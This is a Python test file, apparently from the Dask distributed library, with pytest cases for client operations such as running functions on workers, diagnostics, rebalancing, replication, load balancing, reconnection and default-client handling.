async def test_run_coroutine(c, s, a, b):
results = await c.run(geninc, 1, delay=0.05)
assert results == {a.address: 2, b.address: 2}
results = await c.run(geninc, 1, delay=0.05, workers=[a.address])
assert results == {a.address: 2}
results = await c.run(geninc, 1, workers=[])
assert results == {}
with pytest.raises(RuntimeError, match="hello"):
await c.run(throws, 1)
results = await c.run(asyncinc, 2, delay=0.01)
assert results == {a.address: 3, b.address: 3}
def test_run_coroutine_sync(c, s, a, b):
result = c.run(geninc, 2, delay=0.01)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(geninc, 2, workers=[a["address"]])
assert result == {a["address"]: 3}
t1 = time()
result = c.run(geninc, 2, delay=10, wait=False)
t2 = time()
assert result is None
assert t2 - t1 <= 1.0
@gen_cluster(client=True)
async def test_run_coroutine_deprecated(c, s, a, b):
async def foo():
return "bar"
with pytest.warns(FutureWarning, match="Client.run "):
results = await c.run_coroutine(foo)
assert results == {a.address: "bar", b.address: "bar"}
def test_run_exception(c):
def raise_exception(exc_type, exc_msg):
raise exc_type(exc_msg)
for exc_type in [ValueError, RuntimeError]:
with pytest.raises(exc_type, match="informative message"):
c.run(raise_exception, exc_type, "informative message")
def test_diagnostic_ui(loop):
with cluster() as (s, [a, b]):
a_addr = a["address"]
b_addr = b["address"]
with Client(s["address"], loop=loop) as c:
d = c.nthreads()
assert d == {a_addr: 1, b_addr: 1}
d = c.nthreads([a_addr])
assert d == {a_addr: 1}
d = c.nthreads(a_addr)
assert d == {a_addr: 1}
d = c.nthreads(a["address"])
assert d == {a_addr: 1}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(inc, 3)
wait([x, y, z])
d = c.who_has()
assert set(d) == {x.key, y.key, z.key}
assert all(w in [a_addr, b_addr] for v in d.values() for w in v)
assert all(d.values())
d = c.who_has([x, y])
assert set(d) == {x.key, y.key}
d = c.who_has(x)
assert set(d) == {x.key}
d = c.has_what()
assert set(d) == {a_addr, b_addr}
assert all(k in [x.key, y.key, z.key] for v in d.values() for k in v)
d = c.has_what([a_addr])
assert set(d) == {a_addr}
d = c.has_what(a_addr)
assert set(d) == {a_addr}
def test_diagnostic_nbytes_sync(c):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
wait(incs + doubles)
assert c.nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert c.nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_cluster(client=True)
async def test_diagnostic_nbytes(c, s, a, b):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
await wait(incs + doubles)
assert s.get_nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert s.get_nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_cluster(client=True, nthreads=[])
async def test_worker_aliases(c, s):
a = Worker(s.address, name="alice")
b = Worker(s.address, name="bob")
w = Worker(s.address, name=3)
await asyncio.gather(a, b, w)
L = c.map(inc, range(10), workers="alice")
future = await c.scatter(123, workers=3)
await wait(L)
assert len(a.data) == 10
assert len(b.data) == 0
assert dict(w.data) == {future.key: 123}
for i, alias in enumerate([3, [3], "alice"]):
result = await c.submit(lambda x: x + 1, i, workers=alias)
assert result == i + 1
await asyncio.gather(a.close(), b.close(), w.close())
def test_persist_get_sync(c):
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
assert xxyy3.compute() == ((1 + 1) + (2 + 2)) + 10
@gen_cluster(client=True)
async def test_persist_get(c, s, a, b):
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
await asyncio.sleep(0.5)
result = await c.gather(c.get(xxyy3.dask, xxyy3.__dask_keys__(), sync=False))
assert result[0] == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
def test_client_num_fds(loop):
with cluster() as (s, [a, b]):
proc = psutil.Process()
with Client(s["address"], loop=loop) as c: # first client to start loop
before = proc.num_fds() # measure
for i in range(4):
with Client(s["address"], loop=loop): # start more clients
pass
start = time()
while proc.num_fds() > before:
sleep(0.01)
assert time() < start + 10, (before, proc.num_fds())
@gen_cluster()
async def test_startup_close_startup(s, a, b):
c = await Client(s.address, asynchronous=True)
await c.close()
c = await Client(s.address, asynchronous=True)
await c.close()
def test_startup_close_startup_sync(loop):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
sleep(0.1)
with Client(s["address"]) as c:
pass
with Client(s["address"]) as c:
pass
sleep(0.1)
with Client(s["address"]) as c:
pass
@gen_cluster(client=True)
async def test_badly_serialized_exceptions(c, s, a, b):
def f():
class BadlySerializedException(Exception):
def __reduce__(self):
raise TypeError()
raise BadlySerializedException("hello world")
x = c.submit(f)
with pytest.raises(Exception, match="hello world"):
await x
@gen_cluster(
client=True,
Worker=Nanny,
worker_kwargs={"memory_limit": "1 GiB"},
config={"distributed.worker.memory.rebalance.sender-min": 0.3},
)
async def test_rebalance(c, s, *_):
"""Test Client.rebalance(). These are just to test the Client wrapper around
Scheduler.rebalance(); for more thorough tests on the latter see test_scheduler.py.
"""
# We used nannies to have separate processes for each worker
a, b = s.workers
# Generate 10 buffers worth 512 MiB total on worker a. This sends its memory
# utilisation slightly above 50% (after counting unmanaged) which is above the
# distributed.worker.memory.rebalance.sender-min threshold.
futures = c.map(lambda _: "x" * (2 ** 29 // 10), range(10), workers=[a])
await wait(futures)
# Wait for heartbeats
while s.memory.process < 2 ** 29:
await asyncio.sleep(0.1)
assert await c.run(lambda dask_worker: len(dask_worker.data)) == {a: 10, b: 0}
await c.rebalance()
ndata = await c.run(lambda dask_worker: len(dask_worker.data))
# Allow for some uncertainty as the unmanaged memory is not stable
assert sum(ndata.values()) == 10
assert 3 <= ndata[a] <= 7
assert 3 <= ndata[b] <= 7
@gen_cluster(
nthreads=[("127.0.0.1", 1)] * 3,
client=True,
Worker=Nanny,
worker_kwargs={"memory_limit": "1 GiB"},
)
async def test_rebalance_workers_and_keys(client, s, *_):
"""Test Client.rebalance(). These are just to test the Client wrapper around
Scheduler.rebalance(); for more thorough tests on the latter see test_scheduler.py.
"""
a, b, c = s.workers
futures = client.map(lambda _: "x" * (2 ** 29 // 10), range(10), workers=[a])
await wait(futures)
# Wait for heartbeats
while s.memory.process < 2 ** 29:
await asyncio.sleep(0.1)
# Passing empty iterables is not the same as omitting the arguments
await client.rebalance([])
await client.rebalance(workers=[])
assert await client.run(lambda dask_worker: len(dask_worker.data)) == {
a: 10,
b: 0,
c: 0,
}
# Limit rebalancing to two arbitrary keys and two arbitrary workers.
await client.rebalance([futures[3], futures[7]], [a, b])
assert await client.run(lambda dask_worker: len(dask_worker.data)) == {
a: 8,
b: 2,
c: 0,
}
with pytest.raises(KeyError):
await client.rebalance(workers=["notexist"])
def test_rebalance_sync():
# can't use the 'c' fixture because we need workers to run in a separate process
with Client(n_workers=2, memory_limit="1 GiB", dashboard_address=":0") as c:
s = c.cluster.scheduler
a, b = (ws.address for ws in s.workers.values())
futures = c.map(lambda _: "x" * (2 ** 29 // 10), range(10), workers=[a])
wait(futures)
# Wait for heartbeat
while s.memory.process < 2 ** 29:
sleep(0.1)
assert c.run(lambda dask_worker: len(dask_worker.data)) == {a: 10, b: 0}
c.rebalance()
ndata = c.run(lambda dask_worker: len(dask_worker.data))
# Allow for some uncertainty as the unmanaged memory is not stable
assert sum(ndata.values()) == 10
assert 3 <= ndata[a] <= 7
assert 3 <= ndata[b] <= 7
@gen_cluster(client=True)
async def test_rebalance_unprepared(c, s, a, b):
"""Client.rebalance() internally waits for unfinished futures"""
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
# Let the futures reach the scheduler
await asyncio.sleep(0.1)
# We didn't wait enough for futures to complete. However, Client.rebalance() will
# block until all futures are completed before invoking Scheduler.rebalance().
await c.rebalance(futures)
s.validate_state()
@gen_cluster(client=True)
async def test_rebalance_raises_on_explicit_missing_data(c, s, a, b):
"""rebalance() raises KeyError if explicitly listed futures disappear"""
f = Future("x", client=c, state="memory")
with pytest.raises(KeyError, match="Could not rebalance keys:"):
await c.rebalance(futures=[f])
@gen_cluster(client=True)
async def test_receive_lost_key(c, s, a, b):
x = c.submit(inc, 1, workers=[a.address])
await x
await a.close()
while x.status == "finished":
await asyncio.sleep(0.01)
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_unrunnable_task_runs(c, s, a, b):
x = c.submit(inc, 1, workers=[a.ip])
await x
await a.close()
while x.status == "finished":
await asyncio.sleep(0.01)
assert s.tasks[x.key] in s.unrunnable
assert s.get_task_status(keys=[x.key]) == {x.key: "no-worker"}
w = await Worker(s.address, loop=s.loop)
while x.status != "finished":
await asyncio.sleep(0.01)
assert s.tasks[x.key] not in s.unrunnable
result = await x
assert result == 2
await w.close()
@gen_cluster(client=True, nthreads=[])
async def test_add_worker_after_tasks(c, s):
futures = c.map(inc, range(10))
n = await Nanny(s.address, nthreads=2, loop=s.loop)
await c.gather(futures)
await n.close()
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_workers_register_indirect_data(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
y = c.submit(inc, x, workers=b.ip)
await y
assert b.data[x.key] == 1
assert s.tasks[x.key].who_has == {s.workers[a.address], s.workers[b.address]}
assert s.workers[b.address].has_what == {s.tasks[x.key], s.tasks[y.key]}
s.validate_state()
@gen_cluster(client=True)
async def test_submit_on_cancelled_future(c, s, a, b):
x = c.submit(inc, 1)
await x
await c.cancel(x)
with pytest.raises(CancelledError):
c.submit(inc, x)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate(c, s, *workers):
[a, b] = await c.scatter([1, 2])
await s.replicate(keys=[a.key, b.key], n=5)
s.validate_state()
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers) == 5
assert sum(b.key in w.data for w in workers) == 5
@gen_cluster(client=True)
async def test_replicate_tuple_keys(c, s, a, b):
x = delayed(inc)(1, dask_key_name=("x", 1))
f = c.persist(x)
await c.replicate(f, n=5)
s.validate_state()
assert a.data and b.data
await c.rebalance(f)
s.validate_state()
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_workers(c, s, *workers):
[a, b] = await c.scatter([1, 2], workers=[workers[0].address])
await s.replicate(
keys=[a.key, b.key], n=5, workers=[w.address for w in workers[:5]]
)
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers[:5]) == 5
assert sum(b.key in w.data for w in workers[:5]) == 5
assert sum(a.key in w.data for w in workers[5:]) == 0
assert sum(b.key in w.data for w in workers[5:]) == 0
await s.replicate(keys=[a.key, b.key], n=1)
assert len(s.tasks[a.key].who_has) == 1
assert len(s.tasks[b.key].who_has) == 1
assert sum(a.key in w.data for w in workers) == 1
assert sum(b.key in w.data for w in workers) == 1
s.validate_state()
await s.replicate(keys=[a.key, b.key], n=None) # all
assert len(s.tasks[a.key].who_has) == 10
assert len(s.tasks[b.key].who_has) == 10
s.validate_state()
await s.replicate(
keys=[a.key, b.key], n=1, workers=[w.address for w in workers[:5]]
)
assert sum(a.key in w.data for w in workers[:5]) == 1
assert sum(b.key in w.data for w in workers[:5]) == 1
assert sum(a.key in w.data for w in workers[5:]) == 5
assert sum(b.key in w.data for w in workers[5:]) == 5
s.validate_state()
class CountSerialization:
def __init__(self):
self.n = 0
def __setstate__(self, n):
self.n = n + 1
def __getstate__(self):
return self.n
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_tree_branching(c, s, *workers):
obj = CountSerialization()
[future] = await c.scatter([obj])
await s.replicate(keys=[future.key], n=10)
max_count = max(w.data[future.key].n for w in workers)
assert max_count > 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_client_replicate(c, s, *workers):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
await c.replicate([x, y], n=5)
assert len(s.tasks[x.key].who_has) == 5
assert len(s.tasks[y.key].who_has) == 5
await c.replicate([x, y], n=3)
assert len(s.tasks[x.key].who_has) == 3
assert len(s.tasks[y.key].who_has) == 3
await c.replicate([x, y])
s.validate_state()
assert len(s.tasks[x.key].who_has) == 10
assert len(s.tasks[y.key].who_has) == 10
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.2", 1), ("127.0.0.2", 1)],
)
async def test_client_replicate_host(client, s, a, b, c):
aws = s.workers[a.address]
bws = s.workers[b.address]
cws = s.workers[c.address]
x = client.submit(inc, 1, workers="127.0.0.2")
await wait([x])
assert s.tasks[x.key].who_has == {bws} or s.tasks[x.key].who_has == {cws}
await client.replicate([x], workers=["127.0.0.2"])
assert s.tasks[x.key].who_has == {bws, cws}
await client.replicate([x], workers=["127.0.0.1"])
assert s.tasks[x.key].who_has == {aws, bws, cws}
def test_client_replicate_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
c.replicate([x, y], n=2)
who_has = c.who_has()
assert len(who_has[x.key]) == len(who_has[y.key]) == 2
with pytest.raises(ValueError):
c.replicate([x], n=0)
assert y.result() == 3
@pytest.mark.skipif(WINDOWS, reason="Windows timer too coarse-grained")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 1)
async def test_task_load_adapts_quickly(c, s, a):
future = c.submit(slowinc, 1, delay=0.2) # slow
await wait(future)
assert 0.15 < s.task_prefixes["slowinc"].duration_average < 0.4
futures = c.map(slowinc, range(10), delay=0) # very fast
await wait(futures)
assert 0 < s.task_prefixes["slowinc"].duration_average < 0.1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_after_fast_functions(c, s, a, b):
x = c.submit(inc, 1, workers=a.address) # very fast
y = c.submit(inc, 2, workers=b.address) # very fast
await wait([x, y])
futures = c.map(inc, range(2, 11))
await wait(futures)
assert any(f.key in a.data for f in futures)
assert any(f.key in b.data for f in futures)
# assert abs(len(a.data) - len(b.data)) <= 3
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_on_startup(c, s, a, b):
x, y = c.map(inc, [1, 2])
await wait([x, y])
assert len(a.data) == len(b.data) == 1
@pytest.mark.skip
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_contiguous_load(c, s, a, b):
w, x, y, z = c.map(inc, [1, 2, 3, 4])
await wait([w, x, y, z])
groups = [set(a.data), set(b.data)]
assert {w.key, x.key} in groups
assert {y.key, z.key} in groups
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit(c, s, *workers):
L = [c.submit(slowinc, i) for i in range(4)]
await wait(L)
for w in workers:
assert len(w.data) == 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit_and_resident_data(c, s, *workers):
[x] = await c.scatter([10], broadcast=True)
L = [c.submit(slowinc, x, pure=False) for i in range(4)]
await wait(L)
for w in workers:
assert len(w.data) == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(slowinc, range(100), delay=delay)
futures = c.map(slowinc, futures, delay=delay / 10)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores_random(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(randominc, range(100), scale=0.1)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_cancel_clears_processing(c, s, *workers):
da = pytest.importorskip("dask.array")
x = c.submit(slowinc, 1, delay=0.2)
while not s.tasks:
await asyncio.sleep(0.01)
await c.cancel(x)
while any(v for w in s.workers.values() for v in w.processing):
await asyncio.sleep(0.01)
s.validate_state()
def test_default_get():
with cluster() as (s, [a, b]):
pre_get = dask.base.get_scheduler()
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"], set_as_default=True) as c:
assert dask.base.get_scheduler() == c.get
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c = Client(s["address"], set_as_default=False)
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
c.close()
c = Client(s["address"], set_as_default=True)
assert dask.config.get("shuffle") == "tasks"
assert dask.base.get_scheduler() == c.get
c.close()
assert dask.base.get_scheduler() == pre_get
pytest.raises(KeyError, dask.config.get, "shuffle")
with Client(s["address"]) as c:
assert dask.base.get_scheduler() == c.get
with Client(s["address"], set_as_default=False) as c:
assert dask.base.get_scheduler() != c.get
assert dask.base.get_scheduler() != c.get
with Client(s["address"], set_as_default=True) as c1:
assert dask.base.get_scheduler() == c1.get
with Client(s["address"], set_as_default=True) as c2:
assert dask.base.get_scheduler() == c2.get
assert dask.base.get_scheduler() == c1.get
assert dask.base.get_scheduler() == pre_get
@gen_cluster()
async def test_set_as_default(s, a, b):
with pytest.raises(ValueError):
default_client()
async with Client(s.address, set_as_default=False, asynchronous=True) as c1:
with pytest.raises(ValueError):
default_client()
async with Client(s.address, set_as_default=True, asynchronous=True) as c2:
assert default_client() is c2
async with Client(s.address, set_as_default=True, asynchronous=True) as c3:
assert default_client() is c3
async with Client(
s.address, set_as_default=False, asynchronous=True
) as c4:
assert default_client() is c3
await c4.scheduler_comm.close()
while c4.status != "running":
await asyncio.sleep(0.01)
assert default_client() is c3
with pytest.raises(ValueError):
default_client()
@gen_cluster(client=True)
async def test_get_processing(c, s, a, b):
processing = await c.processing()
assert processing == valmap(tuple, s.processing)
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a.address], allow_other_workers=True
)
await asyncio.sleep(0.2)
x = await c.processing()
assert set(x) == {a.address, b.address}
x = await c.processing(workers=[a.address])
assert isinstance(x[a.address], (list, tuple))
@gen_cluster(client=True)
async def test_get_foo(c, s, a, b):
futures = c.map(inc, range(10))
await wait(futures)
x = await c.scheduler.ncores()
assert x == s.nthreads
x = await c.scheduler.ncores(workers=[a.address])
assert x == {a.address: s.nthreads[a.address]}
x = await c.scheduler.has_what()
assert valmap(sorted, x) == valmap(sorted, s.has_what)
x = await c.scheduler.has_what(workers=[a.address])
assert valmap(sorted, x) == {a.address: sorted(s.has_what[a.address])}
x = await c.scheduler.nbytes(summary=False)
assert x == s.get_nbytes(summary=False)
x = await c.scheduler.nbytes(keys=[futures[0].key], summary=False)
assert x == {futures[0].key: s.tasks[futures[0].key].nbytes}
x = await c.scheduler.who_has()
assert valmap(sorted, x) == valmap(sorted, s.who_has)
x = await c.scheduler.who_has(keys=[futures[0].key])
assert valmap(sorted, x) == {futures[0].key: sorted(s.who_has[futures[0].key])}
def assert_dict_key_equal(expected, actual):
assert set(expected.keys()) == set(actual.keys())
for k in actual.keys():
ev = expected[k]
av = actual[k]
assert list(ev) == list(av)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 3)
async def test_get_foo_lost_keys(c, s, u, v, w):
x = c.submit(inc, 1, workers=[u.address])
y = await c.scatter(3, workers=[v.address])
await wait([x, y])
ua, va, wa = u.address, v.address, w.address
d = await c.scheduler.has_what()
assert_dict_key_equal(d, {ua: [x.key], va: [y.key], wa: []})
d = await c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [x.key], va: [y.key]})
d = await c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
d = await c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [ua], y.key: [va]})
await u.close()
await v.close()
d = await c.scheduler.has_what()
assert_dict_key_equal(d, {wa: []})
d = await c.scheduler.has_what(workers=[ua, va])
assert_dict_key_equal(d, {ua: [], va: []})
# The scattered key cannot be recomputed so it is forgotten
d = await c.scheduler.who_has()
assert_dict_key_equal(d, {x.key: []})
# ... but when passed explicitly, it is included in the result
d = await c.scheduler.who_has(keys=[x.key, y.key])
assert_dict_key_equal(d, {x.key: [], y.key: []})
@pytest.mark.slow
@gen_cluster(
client=True, Worker=Nanny, clean_kwargs={"threads": False, "processes": False}
)
async def test_bad_tasks_fail(c, s, a, b):
f = c.submit(sys.exit, 0)
with captured_logger(logging.getLogger("distributed.scheduler")) as logger:
with pytest.raises(KilledWorker) as info:
await f
text = logger.getvalue()
assert f.key in text
assert info.value.last_worker.nanny in {a.address, b.address}
await asyncio.gather(a.close(), b.close())
def test_get_processing_sync(c, s, a, b):
processing = c.processing()
assert not any(v for v in processing.values())
futures = c.map(
slowinc, range(10), delay=0.1, workers=[a["address"]], allow_other_workers=False
)
sleep(0.2)
aa = a["address"]
bb = b["address"]
processing = c.processing()
assert set(c.processing(aa)) == {aa}
assert set(c.processing([aa])) == {aa}
c.cancel(futures)
def test_close_idempotent(c):
c.close()
c.close()
c.close()
@nodebug
def test_get_returns_early(c):
start = time()
with suppress(RuntimeError):
result = c.get({"x": (throws, 1), "y": (sleep, 1)}, ["x", "y"])
assert time() < start + 0.5
# Futures should be released and forgotten
wait_for(lambda: not c.futures, timeout=0.1)
wait_for(lambda: not any(c.processing().values()), timeout=3)
x = c.submit(inc, 1)
x.result()
with suppress(RuntimeError):
result = c.get({"x": (throws, 1), x.key: (inc, 1)}, ["x", x.key])
assert x.key in c.futures
@pytest.mark.slow
@gen_cluster(Worker=Nanny, client=True, timeout=60)
async def test_Client_clears_references_after_restart(c, s, a, b):
x = c.submit(inc, 1)
assert x.key in c.refcount
await c.restart()
assert x.key not in c.refcount
key = x.key
del x
import gc
gc.collect()
await asyncio.sleep(0)
assert key not in c.refcount
@gen_cluster(Worker=Nanny, client=True)
async def test_restart_timeout_is_logged(c, s, a, b):
with captured_logger(logging.getLogger("distributed.client")) as logger:
await c.restart(timeout="0.5s")
text = logger.getvalue()
assert "Restart timed out after 0.50 seconds" in text
def test_get_stops_work_after_error(c):
with pytest.raises(RuntimeError):
c.get({"x": (throws, 1), "y": (sleep, 1.5)}, ["x", "y"])
start = time()
while any(c.processing().values()):
sleep(0.01)
assert time() < start + 0.5
def test_as_completed_list(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq))
assert set(c.gather(seq2)) == {1, 2, 3, 4, 5}
def test_as_completed_results(c):
seq = c.map(inc, range(5))
seq2 = list(as_completed(seq, with_results=True))
assert set(pluck(1, seq2)) == {1, 2, 3, 4, 5}
assert set(pluck(0, seq2)) == set(seq)
@pytest.mark.parametrize("with_results", [True, False])
def test_as_completed_batches(c, with_results):
n = 50
futures = c.map(slowinc, range(n), delay=0.01)
out = []
for batch in as_completed(futures, with_results=with_results).batches():
assert isinstance(batch, (tuple, list))
sleep(0.05)
out.extend(batch)
assert len(out) == n
if with_results:
assert set(pluck(1, out)) == set(range(1, n + 1))
else:
assert set(out) == set(futures)
def test_as_completed_next_batch(c):
futures = c.map(slowinc, range(2), delay=0.1)
ac = as_completed(futures)
assert not ac.is_empty()
assert ac.next_batch(block=False) == []
assert set(ac.next_batch(block=True)).issubset(futures)
while not ac.is_empty():
assert set(ac.next_batch(block=True)).issubset(futures)
assert ac.is_empty()
assert not ac.has_ready()
@gen_cluster(nthreads=[])
async def test_status(s):
c = await Client(s.address, asynchronous=True)
assert c.status == "running"
x = c.submit(inc, 1)
await c.close()
assert c.status == "closed"
@gen_cluster(client=True)
async def test_async_whowhat(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
who_has = await c.who_has()
has_what = await c.has_what()
assert type(who_has) is WhoHas
assert type(has_what) is HasWhat
assert who_has == {x.key: (a.address,)}
assert has_what == {a.address: (x.key,), b.address: ()}
def test_client_repr_html(c):
x = c.submit(inc, 1)
who_has = c.who_has()
has_what = c.has_what()
assert type(who_has) is WhoHas
assert type(has_what) is HasWhat
@gen_cluster(client=True)
async def test_persist_optimize_graph(c, s, a, b):
i = 10
for method in [c.persist, c.compute]:
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=False)
await wait(b4)
assert set(map(stringify, b3.__dask_keys__())).issubset(s.tasks)
b = db.range(i, npartitions=2)
i += 1
b2 = b.map(inc)
b3 = b2.map(inc)
b4 = method(b3, optimize_graph=True)
await wait(b4)
assert not any(stringify(k) in s.tasks for k in b2.__dask_keys__())
@gen_cluster(client=True, nthreads=[])
async def test_scatter_raises_if_no_workers(c, s):
with pytest.raises(TimeoutError):
await c.scatter(1, timeout=0.5)
@pytest.mark.slow
def test_reconnect(loop):
w = Worker("127.0.0.1", 9393, loop=loop)
loop.add_callback(w.start)
scheduler_cli = [
"dask-scheduler",
"--host",
"127.0.0.1",
"--port",
"9393",
"--no-dashboard",
]
with popen(scheduler_cli) as s:
c = Client("127.0.0.1:9393", loop=loop)
start = time()
while len(c.nthreads()) != 1:
sleep(0.1)
assert time() < start + 3
x = c.submit(inc, 1)
assert x.result() == 2
start = time()
while c.status != "connecting":
assert time() < start + 5
sleep(0.01)
assert x.status == "cancelled"
with pytest.raises(CancelledError):
x.result()
with popen(scheduler_cli) as s:
start = time()
while c.status != "running":
sleep(0.1)
assert time() < start + 5
start = time()
while len(c.nthreads()) != 1:
sleep(0.05)
assert time() < start + 15
x = c.submit(inc, 1)
assert x.result() == 2
start = time()
while True:
try:
x.result()
assert False
except CommClosedError:
continue
except CancelledError:
break
assert time() < start + 5
sleep(0.1)
sync(loop, w.close)
c.close()
@gen_cluster(client=True, nthreads=[], client_kwargs={"timeout": 0.5})
async def test_reconnect_timeout(c, s):
with captured_logger(logging.getLogger("distributed.client")) as logger:
await s.close()
while c.status != "closed":
await c._update_scheduler_info()
await asyncio.sleep(0.05)
text = logger.getvalue()
assert "Failed to reconnect" in text
@pytest.mark.avoid_ci(reason="hangs on github actions ubuntu-latest CI")
@pytest.mark.slow
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.parametrize("worker,count,repeat", [(Worker, 100, 5), (Nanny, 10, 20)])
def test_open_close_many_workers(loop, worker, count, repeat):
proc = psutil.Process()
with cluster(nworkers=0, active_rpc_timeout=2) as (s, _):
gc.collect()
before = proc.num_fds()
done = Semaphore(0)
running = weakref.WeakKeyDictionary()
workers = set()
status = True
async def start_worker(sleep, duration, repeat=1):
for i in range(repeat):
await asyncio.sleep(sleep)
if not status:
return
w = worker(s["address"], loop=loop)
running[w] = None
await w
workers.add(w)
addr = w.worker_address
running[w] = addr
await asyncio.sleep(duration)
await w.close()
del w
await asyncio.sleep(0)
done.release()
for i in range(count):
loop.add_callback(
start_worker, random.random() / 5, random.random() / 5, repeat=repeat
)
with Client(s["address"], loop=loop) as c:
sleep(1)
for i in range(count):
done.acquire(timeout=5)
gc.collect()
if not running:
break
start = time()
while c.nthreads():
sleep(0.2)
assert time() < start + 10
while len(workers) < count * repeat:
sleep(0.2)
status = False
[c.sync(w.close) for w in list(workers)]
for w in workers:
assert w.status == Status.closed
start = time()
while proc.num_fds() > before:
print("fds:", before, proc.num_fds())
sleep(0.1)
if time() > start + 10:
if worker == Worker: # this is an esoteric case
print("File descriptors did not clean up")
break
else:
raise ValueError("File descriptors did not clean up")
@gen_cluster()
async def test_idempotence(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
# Submit
x = c.submit(inc, 1)
await x
log = list(s.transition_log)
len_single_submit = len(log) # see last assert
y = f.submit(inc, 1)
assert x.key == y.key
await y
await asyncio.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
# Error
a = c.submit(div, 1, 0)
await wait(a)
assert a.status == "error"
log = list(s.transition_log)
b = f.submit(div, 1, 0)
assert a.key == b.key
await wait(b)
await asyncio.sleep(0.1)
log2 = list(s.transition_log)
assert log == log2
s.transition_log.clear()
# Simultaneous Submit
d = c.submit(inc, 2)
e = c.submit(inc, 2)
await wait([d, e])
assert len(s.transition_log) == len_single_submit
await c.close()
await f.close()
def test_scheduler_info(c):
info = c.scheduler_info()
assert isinstance(info, dict)
assert len(info["workers"]) == 2
assert isinstance(info["started"], float)
def test_write_scheduler_file(c):
info = c.scheduler_info()
with tmpfile("json") as scheduler_file:
c.write_scheduler_file(scheduler_file)
with Client(scheduler_file=scheduler_file) as c2:
info2 = c2.scheduler_info()
assert c.scheduler.address == c2.scheduler.address
# test that a ValueError is raised if the scheduler_file
# attribute is already set
with pytest.raises(ValueError):
c.write_scheduler_file(scheduler_file)
def test_get_versions(c):
requests = pytest.importorskip("requests")
v = c.get_versions()
assert v["scheduler"] is not None
assert v["client"] is not None
assert len(v["workers"]) == 2
